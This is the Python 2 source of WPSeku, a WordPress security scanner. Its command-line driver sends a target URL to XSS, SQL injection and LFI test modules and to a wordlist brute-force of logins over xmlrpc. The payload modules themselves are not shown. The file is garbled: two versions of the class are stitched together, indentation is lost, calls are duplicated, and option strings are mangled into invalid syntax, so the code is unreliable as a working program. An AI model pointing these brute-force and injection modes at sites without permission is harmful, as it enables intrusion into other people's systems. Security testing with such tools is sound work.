"""docstring for WPSeku"""
r = wpcolor.wpcolor().red(1)
w = wpcolor.wpcolor().white(0)
y = wpcolor.wpcolor().yellow(4)
e = wpcolor.wpcolor().reset()
xss = False
sql = False
lfi = False
brute = False
agent = ""
proxy = None
redirect = True
cookie = None
user = None
method = None
query = None
wordlist = None
check = wphttp.check()
printf = wpprint.wpprint()
_ = wpall.wpall()
def __init__(self, kwargs):
self.kwargs = kwargs
def Banner(self):
print self.r + r"__ ______ ____ _ " + self.e
print self.r + r"\ \ / / _ \/ ___| ___| | ___ _ " + self.e
print self.r + r" \ \ /\ / /| |_) \___ \ / _ \ |/ / | | |" + self.e
print self.r + r" \ V V / | __/ ___) | __/ <| |_| |" + self.e
print self.r + r" \_/\_/ |_| |____/ \___|_|\_\\__,_|" + self.e
print self.w + " " + self.e
print self.w + "|| WPSeku - Wordpress Security Scanner " + self.e
print self.w + "|| Version 0.2.1 " + self.e
print self.w + "|| Momo Outaadi (M4ll0k) " + self.e
print self.w + "|| %shttps://github.com/m4ll0k/WPSeku%s\n" % (self.y,
self.e)
def Usage(self, ext=False):
path = os.path.basename(sys.argv[0])
self.Banner()
print "Usage: ./%s [--target|-t] http://localhost\n" % path
print "\t-t --target\tTarget URL (eg: http://localhost)"
print "\t-x --xss\tTesting XSS vulns"
print "\t-s --sql\tTesting SQL vulns"
print "\t-l --lfi\tTesting LFI vulns"
print "\t-q --query\tTestable parameters (eg: \"id=1&test=1\")"
print "\t-b --brute\tBruteforce login via xmlrpc"
print "\t-u --user\tSet username, default=admin"
print "\t-p --proxy\tSet proxy, (host:port)"
print "\t-m --method\tSet method (GET/POST)"
print "\t-c --cookie\tSet cookies"
print "\t-w --wordlist\tSet wordlist"
print "\t-a --agent\tSet user-agent"
print "\t-r --redirect\tRedirect target url, default=True"
print "\t-h --help\tShow this help and exit\n"
print "Examples:"
print "\t%s --target http://localhost" % path
print "\t%s -t http://localhost/wp-admin/post.php -m GET -q \"post=49&action=edit\" [-x,-s,-l]" % path
print "\t%s --target http://localhost --brute --wordlist dict.txt" % path
print "\t%s --target http://localhost --brute --user test --wordlist dict.txt\n" % path
if ext == True:
sys.exit()
def CheckTarget(self, url):
scheme = urlparse.urlsplit(url).scheme
netloc = urlparse.urlsplit(url).netloc
path = urlparse.urlsplit(url).path
if scheme not in ['http', 'https', '']:
sys.exit(self.printf.erro('Schme %s not supported' % (scheme)))
if netloc == "":
return "http://" + path
else:
return scheme + "://" + netloc + path
def Main(self):
if len(sys.argv) <= 2:
self.Usage(True)
try:
opts, args = getopt.getopt(
self.kwargs, "t:x=:s=:l=:b=:h=:q:u:p:m:c:w:a:r:", [
'target=', 'xss', 'sql', 'lfi', 'query=', 'brute', 'user='******'proxy=', 'method=', 'cookie=', 'wordlist=', 'agent=',
'redirect=', 'help'
])
except getopt.error as error:
pass
for o, a in opts:
if o in ('-t', '--target'):
self.target = self.CheckTarget(a)
if o in ('-x', '--xss'):
self.xss = True
if o in ('-s', '--sql'):
self.sql = True
if o in ('-l', '--lfi'):
self.lfi = True
if o in ('-q', '--query'):
self.query = a
if o in ('-b', '--brute'):
self.brute = True
if o in ('-u', '--user'):
self.user = a
if o in ('-p', '--proxy'):
self.proxy = a
if o in ('-m', '--method'):
self.method = a
if o in ('-c', '--cookie'):
self.cookie = a
if o in ('-w', '--wordlist'):
self.wordlist = a
if o in ('-a', '--agent'):
self.agent = a
if o in ('-r', '--redirect'):
self.redirect = a
if o in ('-h', '--help'):
self.Usage(True)
self.Banner()
self.printf.plus('Target: %s' % self.target)
self.printf.plus('Starting: %s\n' %
(time.strftime('%d/%m/%Y %H:%M:%S')))
print self.agent
if not self.agent: self.agent = 'Mozilla/5.0'
if not self.proxy: self.proxy = None
if not self.cookie: self.cookie = None
if not self.redirect: self.redirect = False
if not self.user: self.user = "******"
# xss attack
if self.xss == True:
if not self.method:
sys.exit(self.printf.erro('Method not exisits!'))
if not self.query: sys.exit(self.printf.erro('Not found query'))
wpxss.wpxss(self.agent, self.proxy, self.redirect, self.target,
self.method, self.query).run()
sys.exit()
# sql attack
if self.sql == True:
if not self.method:
sys.exit(self.printf.erro('Method not exisits!'))
if not self.query: sys.exit(self.printf.erro('Not found query'))
wpsql.wpsql(self.agent, self.proxy, self.redirect, self.target,
self.method, self.query).run()
sys.exit()
# lfi attack
if self.lfi == True:
if not self.method:
sys.exit(self.printf.erro('Method not exisits!'))
if not self.query: sys.exit(self.printf.erro('Not found query'))
wplfi.wplfi(self.agent, self.proxy, self.redirect, self.target,
self.method, self.query).run()
sys.exit()
# attack bruteforce
if self.brute == True:
if not self.wordlist:
sys.exit(self.printf.erro('Not found wordlist!'))
wpxmlrpc.wpxmlrpc(self.agent, self.proxy, self.redirect,
self.target, self.cookie, self.wordlist,
self.user).run()
sys.exit()
# discovery
if self.target:
self._.run(self.agent, self.proxy, self.redirect, self.target)
class WPSeku(object):
out = wpprint.wpprint()
def banner(self):
print
def usage(self,ext=False):
path = os.path.basename(sys.argv[0])
self.banner()
print "Usage: {} [options]\n".format(path)
print "\t-t --target\tTarget URL (eg: http://site.com)"
print "\t-b --brute\tBruteforce login via xmlrpc"
print "\t-u --user\tSet username, (df=admin)"
print "\t-p --proxy\tSet proxy, (host:port)"
print "\t-c --cookie\tSet cookie, (--cookie=\"COOKIE\")"
print "\t-a --agent\tSet user-agent, (--agent=\"AGENT\")"
print "\t-r --ragent\tSet random user-agent"
print "\t-f --redirect\tRedirect target url, (df=true)"
print "\t-m --timeout\tSet timeout, (df=None)"
print "\t-w --wordlist\tSet wordlist, (df=db/wordlist.txt)"
print "\t-h --help\tShow this help and exit\n"
print "Examples:"
print "\t{} -t http://site.com".format(path)
print "\t{} -t http://site.com -b -w wlist.txt".format(path)
print "\t{} -t http://site.com/wordpress/ --redirect".format(path)
print "\t{} -t http://site.com -b -u test -w wlist.txt\n".format(path)
if ext:
exit()
brute = False
user = "******"
cookie = None
agent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"
redirect = True
wordlist = "db/wordlist.txt"
proxy = None
timeout = None
def main(self,kw):
if len(sys.argv) <= 2:
self.usage(True)
try:
opts,args = getopt.getopt(kw,"t:u:p:c:a:m:w:frbh:",["target=","brute",
"user="******"proxy=","cookie=","timeout=","agent=","ragent","redirect","wordlist=","help"]
)
except getopt.error,e:
self.usage(True)
for opt,arg in opts:
if opt in ('-t','--target'):
self.target = self.check(arg)
if opt in ('-b','--brute'):
self.brute = True
if opt in ('-u','--user'):
self.user = arg
if opt in ('-p','--proxy'):
self.proxy = arg
if opt in ('-c','--cookie'):
self.cookie = arg
if opt in ('-a','--agent'):
self.agent = arg
if opt in ('-r','--ragent'):
pass
if opt in ('-m','--timeout'):
self.timeout = arg
if opt in ('-f','--redirect'):
self.redirect = False
if opt in ('-w','--wordlist'):
self.wordlist = arg
if opt in ('-h','--help'):
self.usage(True)
# starting
self.init()
if self.brute == True:
wpxmlrpc.wpxmlrpc(agent=self.agent,proxy=self.proxy,
redir=self.redirect,time=self.timeout,url=self.target,
cookie=self.cookie,wlist=self.wordlist,user=self.user).run()
exit()
# fingerprint
fingerprint.fingerprint(agent=self.agent,proxy=self.proxy,
redir=self.redirect,time=self.timeout,url=self.target,
cookie=self.cookie).run()
# discovery
discovery.discovery().run(agent=self.agent,proxy=self.proxy,
redir=self.redirect,time=self.timeout,url=self.target,
cookie=self.cookie)
fingerprint.fingerprint(agent=self.agent,proxy=self.proxy,
redir=self.redirect,time=self.timeout,url=self.target,
cookie=self.cookie).run()
# discovery
discovery.discovery().run(agent=self.agent,proxy=self.proxy,
redir=self.redirect,time=self.timeout,url=self.target,
cookie=self.cookie)
def check(self,url):
o = urlsplit(url)
u = ''
if o.netloc == '':
u = 'http://{}'.format(o.path)
else:
u = '{}://{}{}'.format(o.scheme,o.netloc,o.path)
if urlsplit(u).scheme not in ['http','https']:
self.banner()
exit(WPSeku.out.warning('Scheme \"{}\" not support\n'.format(urlsplit(u).scheme)))
return str(u)
def init(self):
self.banner()
WPSeku.out.plus('Target: {}'.format(self.target))
WPSeku.out.plus('Starting: {}\n'.format(time.strftime('%d/%m/%Y %H:%M:%S')))
if __name__ == "__main__":
try:
WPSeku().main(sys.argv[1:])
except KeyboardInterrupt:
exit(wpprint.wpprint().warning('Keyboard interrupt by user'))
